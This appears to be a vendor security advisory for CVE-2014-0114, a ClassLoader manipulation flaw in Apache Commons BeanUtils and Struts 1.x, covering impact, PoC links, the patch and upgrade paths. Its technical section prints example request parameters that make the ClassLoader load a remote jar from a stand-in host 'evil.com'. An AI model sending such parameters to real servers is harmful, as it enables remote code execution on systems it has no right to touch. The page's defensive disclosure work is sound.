CVE-2014-0114
ClassLoader Manipulation vulnerability in commons-beanutils (Maven)
What is CVE-2014-0114 About?
This vulnerability allows remote attackers to manipulate the ClassLoader in Apache Commons BeanUtils, used by Apache Struts 1.x and other products. By exploiting the lack of class property suppression, attackers can execute arbitrary code. The ease of exploitation is high, given the direct manipulation of critical system components.
Affected Software
Technical Details
Apache Commons BeanUtils, in versions prior to 1.9.3, fails to properly suppress the 'class' property during object population. This issue is particularly relevant in frameworks like Apache Struts 1.x, where the 'class' parameter can be passed to the 'getClass' method of an ActionForm object. An attacker can craft a request that includes parameters such as class.classLoader.URLs[0]=jar:http://evil.com/evil.jar!/ or class.classLoader.getParent().addURL(new URL('http://evil.com/')). This allows the attacker to manipulate the application's ClassLoader, effectively loading and executing arbitrary code from a remote location, thereby achieving remote code execution.
What is the Impact of CVE-2014-0114?
Successful exploitation may allow attackers to execute arbitrary code, compromise the integrity of the application, and gain full control over the affected system.
What is the Exploitability of CVE-2014-0114?
Exploitation of this vulnerability is relatively straightforward once an attacker understands the underlying mechanism of ClassLoader manipulation. The complexity is low to moderate, requiring knowledge of how BeanUtils processes properties and how ClassLoaders work in Java. Authentication requirements depend on whether the vulnerable endpoint is accessible to unauthenticated users; if not, authentication might be a prerequisite. Privilege requirements are generally low, as the attack leverages a flaw in how the application processes user-supplied input. This is a remote vulnerability, as attackers can typically send crafted HTTP requests to the server. Special conditions include the application using vulnerable versions of Apache Commons BeanUtils and exposing endpoints that process user input via BeanUtils, such as in Apache Struts ActionForm objects. The likelihood of exploitation is significantly increased if the application directly exposes the 'class' property or properties of the ClassLoader for modification.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| rgielen | Link | A request parameter filter solution for Struts 1 CVE-2014-0114 based on the work of Alvaro Munoz and the HP Fortify team |
| aenlr | Link | PoC for CVE-2014-0114 |
| ricedu | Link | struts1 CVE-2014-0114 classLoader manipulation vulnerability patch |
What are the Available Fixes for CVE-2014-0114?
About the Fix from Resolved Security
The patch modifies the default bean introspection behavior to add SuppressPropertiesBeanIntrospector.SUPPRESS_CLASS, which prevents access to the "class" property via property APIs. This mitigates CVE-2014-0114 by blocking attackers from accessing sensitive Class object information through crafted bean property requests, closing a vector for unauthorized code execution or information disclosure.
Available Upgrade Options
- commons-beanutils:commons-beanutils
- >1.8.0, <1.9.4 → Upgrade to 1.9.4
Struggling with dependency upgrades?
See how Resolved Security's drop-in replacements make it simple.
Book a demoAdditional Resources
- https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3Cissues.commons.apache.org%3E
- https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
- https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3Cissues.commons.apache.org%3E
- http://www.debian.org/security/2014/dsa-2940
- https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293@%3Cissues.commons.apache.org%3E
- http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
- http://marc.info/?l=bugtraq&m=140119284401582&w=2
- https://security.netapp.com/advisory/ntap-20180629-0006
- http://www-01.ibm.com/support/docview.wss?uid=swg21676931
- http://www-01.ibm.com/support/docview.wss?uid=swg21675898
What are Similar Vulnerabilities to CVE-2014-0114?
Similar Vulnerabilities: CVE-2015-0254 , CVE-2010-1870 , CVE-2014-4903 , CVE-2019-0232 , CVE-2017-5645
